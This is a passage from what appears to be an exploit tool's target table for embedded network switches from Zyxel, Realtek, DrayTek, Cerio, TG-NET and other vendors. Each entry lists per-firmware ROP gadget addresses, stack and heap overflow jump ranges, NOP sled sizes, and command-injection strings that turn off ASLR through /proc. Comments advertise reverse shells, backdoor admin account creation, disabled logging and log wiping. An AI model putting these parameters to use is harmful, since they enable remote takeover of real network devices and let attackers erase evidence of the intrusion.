    						'sys_timeSntpDel_set':0x416254,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
    						'sys_timeSettings_set':0x416254,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'vulnerable': True,
    					'heack_cgi_shell': {
    						'cgi':'set.cgi',				# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
    						'START':0x7ffeff04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 77,					# filler/garbage (not used for something constructive)
    						'align': 3,						# Align opcodes in memory
    						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,				# 
    			# Zyxel
    			# CGI Reverse Shell: Yes
    			# Boa/Hydra reverse shell: Yes
    			# Del /var/log/ram.log : Yes
    			# Del /var/log/flash.log : No
    			# Del /mntlog/flash.log: No
    			# Add credentials: Yes (adding username to next free index number, may not be #1)
    			# Del credentials: Yes (index number instead of username, may not be #1)
    			'222-71560': {
    				'template':'Zyxel',					# Static for the vendor
    				'version':'2.40_AAHL.1_20180705',	# Version / binary dependent stuff
    				'model':'GS1900-24',				# Model
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40D60C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f998520,			# la $t9, system) # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x2484e148,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,				# 
    					'stack_cgi_diag': {				# Not vulnerable
    						'vulnerable': False,
    					'stack_cgi_add_account': {
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_sys_localUser_post()
    						'address':0x436D9C,				# Jump one after 'sw $ra'			# (address, binary dependent)
    						'account':'&usrName=USERNAME&usrPrivType=15&usrPriv=15',			# Admin, priv 15
    						'vulnerable': True,
    					'stack_cgi_del_account': { #
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_sys_localUserDel_post()
    						'address':0x437124,				# Jump one after 'sw $ra'			# (address, binary dependent)
    						'account':'&_del=1',			# First additional user in the list
    						'vulnerable': True,				# user
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_setting_post()
    						'log_settings_set':0x47D760,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_delete_post()
    						'log_ramClear':0x480804,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_delete_post()
    						'log_fileClear':0x480804,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,				# 
    					'stack_cgi_sntp': {
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
    						'sys_timeSntp_set':0x43BA8C,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
    						'sys_timeSntpDel_set':0x43BA8C,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
    						'sys_timeSettings_set':0x43AF54,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    					'heack_cgi_shell': {
    						'cgi':'dispatcher.cgi',			# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
    						'query':'username='+ self.random_string(100) +'_RA_START&password='+ self.random_string(59) +'&STARTUP_BACKUP=1'+ (('&' + struct.pack('>L',0x2404FF3D) + struct.pack('>L',0x2404FFFF)) * 70) + '&' + struct.pack('>L',0x2404FF3D) +'_SHELLCODE',
    						'START':0x10010104,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP': 0x104006A0,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 25,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 15,					# filler/garbage (not used for something constructive)
    						'align': 0,						# Align opcodes in memory
    						'stack':False,					# NOP and shellcode lays on: True = stack, False = Heap
    			# Realtek
    			# CGI Reverse Shell: Yes
    			# Boa/Hydra reverse shell: Yes
    			# Del /var/log/ram.log : Yes
    			# Del /var/log/flash.log : No
    			# Del /mntlog/flash.log: No
    			# Add credentials: Yes
    			# Del credentials: Yes
    			'222-40570': {
    				'template':'Realtek',					# Static for the vendor
    				'version':'',				# Version / binary dependent stuff
    				'model':'RTL8380-24GE-4GEC',			# Model
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40E6DC,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f99851c,			# la $t9, system) # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x24841ea8,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,
    					'stack_cgi_add_account': {
    						'vulnerable': False,
    					'stack_cgi_del_account': { #
    						'vulnerable': False,
    					'stack_cgi_diag': {
    						# Ping IPv4
    						'sys_ping_post_cmd':'ip= ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',
    						'web_sys_ping_post':0x422980,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_sys_ping_post()
    						# traceroute
    						#'web_sys_ping_post':0x423168,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_sys_trace_route_post()
    						#'sys_ping_post_cmd':'ip= ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/traceroute_tmp #&tr_maxhop=30&count=1',
    						'vulnerable': True,
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_setting_post()
    						'log_settings_set':0x481968,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_file_del()
    						'log_ramClear':0x4847DC,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_file_del()
    						'log_fileClear':0x4847DC,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
    					'stack_cgi_sntp': {
    						'sys_timeSntp_set':0x42C8F0,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
    						'sys_timeSntpDel_set':0x42C8F0,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
    						'sys_timeSettings_set':0x42C8F0,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'vulnerable': True,
    					'heack_cgi_shell': {
    						'cgi':'dispatcher.cgi',			# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
    						'START':0x7fff7004,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 28,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 20,					# filler/garbage (not used for something constructive)
    						'align': 0,						# Align opcodes in memory
    						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,
    			# OpenMESH (some identical with enginius egs series)
    			# CGI Reverse Shell: Yes
    			# Boa/Hydra reverse shell: Yes
    			# Del /var/log/ram.log : Yes
    			# Del /var/log/flash.log : Yes
    			# Del /mntlog/flash.log: Yes
    			# Add credentials: Yes
    			# Del credentials: Yes
    			'13984-12788': {
    				'template':'OpenMESH',						# Static for the vendor
    				'version':'01.03.24_180823-1626',					# Version / binary dependent stuff
    				'model':'OMS24',				# Model
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40E12C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f99851c,			# la $t9, system # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x248405a0,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,
    					'stack_cgi_add_account': {
    														# /sqfs/home/web/cgi/set.cgi;cgi_sys_acctAdd_set()
    						'address':0x424890,				# Jump one after 'sw $ra'			# (address, binary dependent)
    						'account':'&na=USERNAME&pw=PASSWORD&pv=0&op=1&',			# Admin, priv 15
    						'vulnerable': True,
    					'stack_cgi_del_account': {
    														# /sqfs/home/web/cgi/set.cgi;sn_user_mngSet()
    						'address':0x424890,				# Jump one after 'sw $ra'			# (address, binary dependent)
    						'account':'&na=USERNAME&pw=&pv=0&op=0',		# 
    						'vulnerable': True,				# user
    					'stack_cgi_diag': {
    														# /sqfs/home/web/cgi-bin/datajson.cgi;sn_ipv4PingSet()
    						#'web_sys_ping_post':0x42341C,	# Jump one after 'sw $ra'			# (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/datajson.cgi;sn_tracertSet()
    						'sys_ping_post_cmd':'&ip= ; echo 0 > /proc/sys/kernel/randomize_va_space #&mh=30&uid=0',
    						'sys_ping_post_check':'&ip= ; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',
    						'web_sys_ping_post': 0x424248,	# Jump one after 'sw $ra'			# (address, binary dependent)
    						'vulnerable': True,				# 
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
    						'log_settings_set':0x43EA88,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
    						'log_ramClear':0x440660,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
    						'log_fileClear':0x440660,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    					'stack_cgi_sntp': {
    														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
    						'sys_timeSntp_set':0x425260,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
    						'sys_timeSntpDel_set':0x425260,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
    						'sys_timeSettings_set':0x425260,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'vulnerable': True,
    					'heack_cgi_shell': {
    						'cgi':'security.cgi',			# /sqfs/home/web/cgi-bin/security.cgi; main()
    						'START':0x100181A0,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x104006A0,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 987,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 69,					# filler/garbage (not used for something constructive)
    						'align': 0,						# Align opcodes in memory
    						'stack':False,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,
    			# Xhome (identical with Realtek)
    			# CGI Reverse Shell: Yes
    			# Boa/Hydra reverse shell: Yes
    			# Del /var/log/ram.log : Yes
    			# Del /var/log/flash.log : No
    			# Del /mntlog/flash.log: No
    			# Add credentials: Yes
    			# Del credentials: Yes
    			'222-64895': {
    				'template':'Xhome',					# Static for the vendor
    				'version':'',			# Version / binary dependent stuff
    				'model':'DownLoop-G24M',			# Model
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40E6DC,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f99851c,			# la $t9, system) # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x24841ea8,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,
    					'stack_cgi_add_account': {
    						'vulnerable': False,
    					'stack_cgi_del_account': { #
    						'vulnerable': False,
    					'stack_cgi_diag': {
    						# Ping IPv4
    						'sys_ping_post_cmd':'ip= ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',
    						'web_sys_ping_post':0x4229A0,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_sys_ping_post()
    						# traceroute
    						#'sys_ping_post_cmd':'ip= ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/traceroute_tmp #&tr_maxhop=30&count=1',
    						#'web_sys_ping_post':0x423188,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_sys_trace_route_post()
    						'vulnerable': True,
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_setting_post()
    						'log_settings_set':0x481988,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_file_del()
    						'log_ramClear':0x4847FC,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_file_del()
    						'log_fileClear':0x4847FC,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
    					'stack_cgi_sntp': {
    						'sys_timeSntp_set':0x42C910,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
    						'sys_timeSntpDel_set':0x42C910,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
    						'sys_timeSettings_set':0x42B6F8,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'vulnerable': True,
    					'heack_cgi_shell': {
    						'cgi':'dispatcher.cgi',			# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
    						'START':0x7fff7004,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 28,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 20,					# filler/garbage (not used for something constructive)
    						'align': 0,						# Align opcodes in memory
    						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,
    			# Pakedgedevice & Software
    			# CGI Reverse Shell: Yes
    			# Boa/Hydra reverse shell: No (cannot point JMP correct into NOP on heap)
    			# Del /var/log/ram.log : Yes
    			# Del /var/log/flash.log : Yes
    			# Del /mntlog/flash.log: Yes
    			# Add credentials: Yes
    			# Del credentials: Yes
    			'225-21785': {
    				'template':'Pakedge',					# Static for the vendor
    				'version':'1.04',							# Version / binary dependent stuff
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40C86C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f998538,			# la $t9, system # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x248492ec,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,
    					'stack_cgi_diag': {
    						'vulnerable': False,
    					'stack_cgi_add_account': {
    						'vulnerable': False,
    					'stack_cgi_del_account': { #
    						'vulnerable': False,
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()
    						'log_settings_set':0x413AEC,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
    						'log_ramClear':0x413A14,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
    						'log_fileClear':0x413A14,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    					'stack_cgi_sntp': {
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
    						'sys_timeSntp_set':0x4108E4,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
    						'sys_timeSntpDel_set':0x4108E4,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
    						'sys_timeSettings_set':0x4108E4,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'vulnerable': True,
    					'heack_cgi_shell': {
    						'cgi':'set.cgi',				# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
    						'START':0x7ffeff04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 77,					# filler/garbage (not used for something constructive)
    						'align': 3,						# Align opcodes in memory
    						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,
    			# Draytek
    			# CGI Reverse Shell: Yes
    			# Boa/Hydra reverse shell: No (cannot point JMP correct into NOP on heap)
    			# Del /var/log/ram.log : Yes
    			# Del /var/log/flash.log : Yes
    			# Del /mntlog/flash.log: Yes
    			# Add credentials: Yes
    			# Del credentials: Yes
    			'752-95168': {
    				'template':'DrayTek',					# Static for the vendor
    				'version':'2.1.4',						# Version / binary dependent stuff
    				'model':'VigorSwitch P1100',			#
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40C67C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f99852c,			# la $t9, system # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x248490ac,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,
    					'stack_cgi_diag': {
    						'vulnerable': False,
    					'stack_cgi_add_account': {
    						'vulnerable': False,
    					'stack_cgi_del_account': { #
    						'vulnerable': False,
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()
    						'log_settings_set':0x413E34,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
    						'log_ramClear':0x413D64,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
    						'log_fileClear':0x413D64,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    					'stack_cgi_sntp': {
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
    						'sys_timeSntp_set':0x410CA8,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
    						'sys_timeSntpDel_set':0x410CA8,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
    						'sys_timeSettings_set':0x410CA8,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'vulnerable': True,				# 
    					'heack_cgi_shell': {
    						'cgi':'set.cgi',				# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
    						'START':0x7ffeff04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 77,					# filler/garbage (not used for something constructive)
    						'align': 3,						# Align opcodes in memory
    						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,
    			# Cerio
    			# CGI Reverse Shell: Yes
    			# Boa/Hydra reverse shell: Yes
    			# Del /var/log/ram.log : Yes
    			# Del /var/log/flash.log : Yes
    			# Del /mntlog/flash.log: Yes
    			# Add credentials: Yes
    			# Del credentials: Yes
    			'224-5061': {
    				'template':'Cerio',					# Static for the vendor
    				'version':'1.00.29',				# Version / binary dependent stuff
    				'model':'CS-2424G-24P',			#
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40E6DC,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f998524,			# la $t9, system # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x248411bc,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,
    					'stack_cgi_add_account': {
    						'vulnerable': False,
    					'stack_cgi_del_account': { #
    						'vulnerable': False,
    					'stack_cgi_diag': {
    														# /sqfs/home/web/cgi/set.cgi;cgi_diag_traceroute_set()
    						'sys_ping_post_cmd':'&srvHost= ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
    						'web_sys_ping_post':0x40E114,	# Jump one after 'sw $ra'			# (address, binary dependent)
    						'vulnerable': True,				# 
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()
    						'log_settings_set':0x41DB4C,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
    						'log_ramClear':0x41DA94,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
    						'log_fileClear':0x41DA94,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    					'stack_cgi_sntp': {
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
    						'sys_timeSntp_set':0x415F14,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
    						'sys_timeSntpDel_set':0x415F14,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
    						'sys_timeSettings_set':0x415F14,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'vulnerable': False,			# 
    					'heack_cgi_shell': {
    						'cgi':'set.cgi',				# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
    						'START':0x7ffeff04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 77,					# filler/garbage (not used for something constructive)
    						'align': 3,						# Align opcodes in memory
    						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
    						'vulnerable': True,
    			# Abaniact
    			# CGI Reverse Shell: Yes
    			# Boa/Hydra reverse shell: Yes
    			# Del /var/log/ram.log : Yes
    			# Del /var/log/flash.log : No
    			# Del /mntlog/flash.log: No
    			# Add credentials: Yes
    			# Del credentials: Yes
    			'222-45866': {
    				'template':'Abaniact',					# Static for the vendor
    				'version':'116B00033',				# Version / binary dependent stuff
    				'model':'AML2-PS16-17GP L2',			# Model
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40E65C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f998524,			# la $t9, system) # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x2484152c,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,
    					'stack_cgi_add_account': {
    						'vulnerable': False,
    					'stack_cgi_del_account': { #
    						'vulnerable': False,
    					'stack_cgi_diag': {
    						# Ping IPv4
    						#'sys_ping_post_cmd':'ip= ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',
    						#'web_sys_ping_post':0x4296FC,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_sys_ping_post()
    						# traceroute
    						'web_sys_ping_post':0x429F58,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_sys_trace_route_post()
    						'sys_ping_post_cmd':'ip= ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/traceroute_tmp #&tr_maxhop=30&count=1',
    						'vulnerable': True,
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_setting_post()
    						'log_settings_set':0x4B4FE4,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_file_del()
    						'log_ramClear':0x4BA5D0,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_file_del()
    						'log_fileClear':0x4BA5D0,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
    					'stack_cgi_sntp': {
    						'sys_timeSntp_set':0x43764C,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
    						'sys_timeSntpDel_set':0x43764C,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
    						'sys_timeSettings_set':0x431CC4,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'vulnerable': False,
    					'heack_cgi_shell': {
    						'cgi':'dispatcher.cgi',			# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
    						'START':0x7ffe6e04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
    						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
    						'usr_nop': 53,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 45,					# filler/garbage (not used for something constructive)
    						'align': 0,						# Align opcodes in memory
    						'vulnerable': True,
    						'workaround':True,	# My LAB workaround
    			# TG-NET Botone Technology Co.,Ltd.
    			# (Traces in this image: 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology)
    			# CGI Reverse Shell: Yes
    			# Boa/Hydra reverse shell: Yes
    			# Del /var/log/ram.log : Yes
    			# Del /var/log/flash.log : No
    			# Del /mntlog/flash.log: No
    			# Add credentials: Yes
    			# Del credentials: Yes
    			'222-81176': {
    				'template':'TG-NET',					# Static for the vendor
    				'version':'3.1.1-R1',					# Version / binary dependent stuff
    				'model':'P3026M-24POE (V3)',				# Model
    				'exploit': {
    					'heack_hydra_shell': {
    														# /sqfs/bin/boa; embedparse() 
    						'gadget': 0x40C74C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
    														# /sqfs/bin/boa; read_body(); 
    						'system': 0x8f99851c,			# la $t9, system) # opcode, binary dependent
    														# /sqfs/bin/boa; read_body(); 
    						'handler': 0x2484a2d4,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
    						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
    						'vulnerable': True,
    					'stack_cgi_diag': {
    						'vulnerable': False,
    					'stack_cgi_add_account': {
    						'vulnerable': False,
    					'stack_cgi_del_account': { #
    						'vulnerable': False,
    					'stack_cgi_log': {
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_setting_post()
    						'log_settings_set':0x46AC10,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_file_del()
    						'log_ramClear':0x46E368,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi;web_log_file_del()
    						'log_fileClear':0x46E368,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'vulnerable': True,
    					'stack_cgi_sntp': {
    														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
